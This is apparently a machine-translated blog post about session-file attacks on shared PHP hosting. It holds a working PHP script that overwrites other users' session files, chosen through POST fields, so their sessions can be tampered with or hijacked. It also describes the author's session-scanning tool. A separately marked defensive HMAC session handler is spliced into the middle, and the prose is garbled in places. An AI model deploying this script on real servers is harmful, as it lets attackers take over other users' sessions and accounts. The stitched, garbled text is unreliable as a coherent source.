Jianxin is Jianxin. The idea is really good. In the previous log I wrote a program to obtain the session data of all the users on the server. He thought of the side note. Hey hey, that's right, it's just a matter of modifying the data that was read, so I wrote another spam script to modify the data. The specific implementation is "direct reading => modifying data => submitting changes", with the changes submitted through PHP's file_put_contents function. I ran into a lot of trouble, namely the difference between "_" and "_", but I just found that this attack is really dangerous...
Some of the code for obtaining and modifying data is not published at the moment.
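<?php
session_start();
// Directory where PHP keeps its session files
$path = ini_get('session.save_path');
// Each POST field: name = session file name, value = new session contents
foreach ($_POST as $sess_name => $sess_data)
{
    $_SESSION = $sess_data;
    // Serialize the data in PHP's session format
    $sess_data = session_encode();
    // Overwrite that session file
    file_put_contents("$path/$sess_name", $sess_data);
}
$_SESSION = array();
echo "Fuck OK!";
?>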
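A defensive counterpart to the script above, added here as an example and not part of the original post: a session handler that seals each session file with an HMAC, so contents rewritten by another account on the server are detected and discarded. It assumes PHP 8 and a hypothetical environment variable SESSION_HMAC_KEY holding a per-site secret that other accounts cannot read.

```php
<?php
// Added example, not the post author's code. Assumption: SESSION_HMAC_KEY is a
// hypothetical per-site secret that other accounts on the server cannot read.
final class SealedSessionHandler extends SessionHandler
{
    private const MAC_LEN = 64; // hex length of an HMAC-SHA256 tag

    public function __construct(private string $key) {}

    private function mac(string $id, string $data): string
    {
        // Binding the session ID stops a valid blob being copied into another file.
        return hash_hmac('sha256', $id . "\0" . $data, $this->key);
    }

    public function read(string $id): string|false
    {
        $raw = parent::read($id);
        if ($raw === false || $raw === '') {
            return $raw; // read failure, or a new/empty session
        }
        $mac  = substr($raw, 0, self::MAC_LEN);
        $data = substr($raw, self::MAC_LEN);
        if (!hash_equals($this->mac($id, $data), $mac)) {
            // Log a digest of the ID, not the ID itself, then start from empty.
            error_log('session integrity check failed: ' . substr(hash('sha256', $id), 0, 12));
            return '';
        }
        return $data;
    }

    public function write(string $id, string $data): bool
    {
        // Stored layout: 64 hex characters of MAC followed by the session data.
        return parent::write($id, $this->mac($id, $data) . $data);
    }
}

$key = getenv('SESSION_HMAC_KEY');
if ($key === false || strlen($key) < 32) {
    throw new RuntimeException('SESSION_HMAC_KEY is missing or too short');
}
session_set_save_handler(new SealedSessionHandler($key), true);
session_start();
```

This detects modification only; the session contents remain readable to anyone who can read the files, so each site still needs its own session.save_path that other accounts cannot access.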
PHP server SESSION management tool
My floor was disconnected two days ago, so I couldn't do anything. I just saw an article about session penetration written by a mad dog in my blog. The article was very simple. In the end, the mad dog was "stingy" and didn't send out the application, so whether or not it gets used, I wrote it down first. Because you cannot check the information, you have to read this manual. The code may still have defects in many aspects. The most annoying problems are the regular expression and the file stream operations. It loops through the loop to confuse all my headers, and debugging takes a whole day (it's hard to write code). I hope you will give more comments. Mad dog's article: http://www.loveshell.net/blog/blogview.asp?LogID=101
After writing the program, I conducted a rough test on the execution efficiency of the program.
Execution Environment: winxp, PHP5, apache2, core 2050--1.6GHZ, 512m memory, 945 Motherboard
File System: 6-layer directory with 1000 files per layer. The session file is about 50-bytes.
Searching for these 6000 files takes about 10-15 seconds, and the efficiency is not as low as I thought.